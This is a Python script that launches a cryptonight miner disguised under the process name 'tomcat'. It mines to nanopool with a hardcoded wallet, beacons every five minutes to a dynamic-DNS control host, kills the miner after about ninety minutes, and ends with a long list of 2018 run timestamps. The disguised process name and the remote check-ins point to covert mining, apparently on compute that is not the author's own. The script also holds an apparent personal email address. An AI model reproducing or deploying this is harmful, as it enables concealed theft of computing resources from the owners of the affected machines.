import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:06.639812
#2018-02-17 16:11:04.993806
#2018-02-17 17:58:03.838669
#2018-02-17 19:45:01.810369
#2018-02-17 21:31:07.443998
#2018-02-17 23:15:09.343479
#2018-02-18 01:02:05.064602
#2018-02-18 02:50:05.865488
#2018-02-18 04:40:08.927857
#2018-02-18 06:33:06.416475
#2018-02-18 08:21:05.168691
#2018-02-18 10:09:05.490686
#2018-02-18 11:55:01.500190
#2018-02-18 13:39:07.187971
#2018-02-18 15:29:04.715653
#2018-02-18 17:18:06.128361
#2018-02-18 19:07:01.473508
#2018-02-18 20:53:01.292860
#2018-02-18 22:39:01.617902
#2018-02-19 00:28:05.647943
#2018-02-19 02:13:06.647809
#2018-02-19 04:02:05.130222
#2018-02-19 05:47:04.005873
#2018-02-19 07:34:01.920269
#2018-02-19 09:24:07.409894
#2018-02-19 11:13:05.538535
#2018-02-19 13:01:09.324101
#2018-02-19 14:48:06.801705
#2018-02-19 16:36:08.620958
#2018-02-19 18:21:09.293339
#2018-02-19 20:07:05.907955
#2018-02-19 21:57:06.343875
#2018-02-19 23:42:05.751085
#2018-02-20 01:29:04.573096
#2018-02-20 03:18:06.859580
#2018-02-20 05:04:06.344128
#2018-02-20 06:47:05.314213
#2018-02-20 08:33:01.738297
#2018-02-20 10:17:02.094703
#2018-02-20 12:02:01.485715
#2018-02-20 13:48:14.471456
#2018-02-20 15:30:05.122190
#2018-02-20 17:16:01.250092
#2018-02-20 19:05:09.515571
#2018-02-20 20:55:05.732654
#2018-02-20 22:39:06.099072
#2018-02-21 00:21:07.962787
#2018-02-21 02:09:01.590559
#2018-02-21 03:56:04.002909
#2018-02-21 05:43:03.504056
#2018-02-21 07:31:07.488488
#2018-02-21 09:16:05.961251
#2018-02-21 11:05:06.685770
#2018-02-21 12:52:04.198306
#2018-02-21 14:41:09.244299
#2018-02-21 16:29:07.717587
#2018-02-21 18:20:09.282700
#2018-02-21 20:05:09.997208
#2018-02-21 21:52:08.685004
#2018-02-21 23:39:05.904604
#2018-02-22 01:28:08.442403
#2018-02-22 03:16:06.738664
#2018-02-22 05:02:07.942181
#2018-02-22 06:45:07.224167
#2018-02-22 08:34:04.979395
#2018-02-22 10:21:08.277888
#2018-02-22 12:06:05.367830
#2018-02-22 13:51:08.063356
#2018-02-22 15:38:09.177610
#2018-02-22 17:23:07.674798
#2018-02-22 19:11:01.949684
#2018-02-22 21:02:09.060934
#2018-02-22 22:48:05.671186
#2018-02-23 00:35:06.146737
#2018-02-23 02:22:04.469713
#2018-02-23 04:11:06.644956
#2018-02-23 05:57:04.014347
#2018-02-23 07:44:05.515073
#2018-02-23 09:49:08.828441
#2018-02-23 11:48:09.556645
#2018-02-23 13:37:08.171053
#2018-02-23 15:24:02.007882
#2018-02-23 17:14:01.532353
#2018-02-23 18:57:04.475863
#2018-02-23 20:43:09.309803
#2018-02-23 22:29:02.119115
#2018-02-24 00:14:06.195801
#2018-02-24 02:06:07.912030
#2018-02-24 03:56:01.761377
#2018-02-24 05:42:02.139341
#2018-02-24 07:32:05.476269
#2018-02-24 09:18:06.794354
#2018-02-24 11:13:05.109445
#2018-02-24 13:03:01.863143
#2018-02-24 14:50:03.004577
#2018-02-24 16:42:06.128735
#2018-02-24 18:30:09.919066
#2018-02-24 20:17:05.990699
#2018-02-24 22:09:06.623617
#2018-02-25 01:06:07.987608
#2018-02-25 04:33:06.073295
#2018-02-25 07:59:07.172197